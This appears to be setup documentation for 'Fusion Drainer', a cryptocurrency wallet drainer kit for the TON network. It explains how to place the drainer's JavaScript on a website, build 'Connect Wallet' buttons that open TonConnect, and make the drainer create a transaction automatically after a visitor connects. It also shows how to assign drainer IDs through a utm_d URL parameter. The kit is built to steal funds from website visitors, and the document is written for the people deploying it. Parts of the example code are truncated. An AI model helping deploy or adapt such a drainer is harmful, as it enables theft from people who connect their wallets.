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Drainer Installation

Step 1: Extracting the Archive

After completing the drainer build process, you will receive an archive. Extract all files from the archive to the root directory of your website.

Archive Contents:

  • fusion-drainer.js — The main JavaScript file for handling wallets and transactions.
  • fusion-drainer.css — Styles for the interface.
  • tonconnect-manifest.json — Manifest file for wallet integration via TON Connect.
  • example.html — Example page with configurations for using the drainer.

Step 2: Adding Files to Your Website

After extraction, include the necessary files on your website as shown in the example below.

Minimal Example (example.html):

<!DOCTYPE html>
<html lang="en">
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />

  <!-- Include the CSS file -->
  <link rel="stylesheet" href="/fusion-drainer.css?v=1.0.0" />
  <!-- Container for the default TonConnect button -->
  <div class="ton-connect-button"></div>

  <!-- Include the JavaScript file -->
  <script src="/fusion-drainer.js?v=1.0.0" defer crossorigin></script>

  <!-- Initialize the drainer -->
    window.addEventListener('load', () => {
      // Check for utm_d parameter in the URL
      const params = new URLSearchParams(;
      const utmDrainerID = params.get('utm_d'); // Retrieve ID from utm_d

      // Initialize FusionDrainer with prioritized utm_d usage
        drainerID: utmDrainerID || "default-drainer-id", // Prioritize UTM parameter
        autoCreateTransaction: true,  // Automatically create a transaction
        autoOpenModal: false,         // Disable automatic modal opening

Step 3: Setting Up Wallet Connect Buttons

1. Default TonConnect Button (ton-connect-button):

If you're using the standard TonConnect button, simply add an element with the class ton-connect-button. This element will be replaced with the default button, which automatically initiates wallet connection.


<div class="ton-connect-button"></div>


  • This is a standard button automatically styled and managed by the library.
  • No additional code is needed — just add the element, and it will become active after initialization.

2. Custom Button with ton-connect-trigger Class:

If you want to use your custom button or element to open the TonConnect modal, use the class ton-connect-trigger. This class allows you to link the modal opening to any element without replacing it.

Example of a custom button:

<!-- Custom button for wallet connection -->
<button class="ton-connect-trigger">Connect Wallet</button>


  • Buttons with the ton-connect-trigger class won't be replaced by the library. You can freely style and use them.
  • This is ideal for keeping the button or element's design while using TonConnect functionality.

Step 4: Updating File Versions

Every time you rebuild the library for a domain, ensure to update the file version by adding a version parameter (e.g., ?v=1.0.1) to avoid caching issues:

<link rel="stylesheet" href="/fusion-drainer.css?v=1.0.1" />
<script src="/fusion-drainer.js?v=1.0.1" defer crossorigin></script>

Prioritizing the utm_d UTM Parameter

The utm_d UTM parameter is used to assign a prioritized drainer ID.
If the parameter exists in the URL, its value will be used instead of the default ID set during the build process.

Example URL:


In this case, 12345 will be used as the drainer ID. If the parameter is not present, the default value will be applied.


  1. Extract the archive to your website's root directory.
  2. Include the files on your website.
  3. Use either the default TonConnect button (ton-connect-button) or a custom button with the ton-connect-trigger class to manage wallet connection.
  4. Remember to update file versions (?v=1.0.1) after each library rebuild for a domain.
  5. Use the utm_d parameter in the URL for a prioritized drainer ID.